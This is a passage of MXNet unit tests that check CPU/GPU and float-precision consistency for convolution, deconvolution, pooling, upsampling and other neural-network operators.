conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/7645")
@with_seed(1234)
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency over the data sets of different float types is problematic
# as one max value in a float32 data set may not be the max value in a float16 data set.
# This function will not be called.
@with_seed(1234)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
# this is unstable
# sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
# check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool'))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=False, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=False,
name='pool'))
check_consistency(sym_list, ctx_list)
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_3d_pooling(pool_type):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_3d_pooling('max')
test_3d_pooling('avg')
test_3d_pooling('sum')
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
sym = mx.sym.Activation(name='act', act_type='sigmoid')
ctx_list = [{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float64}},
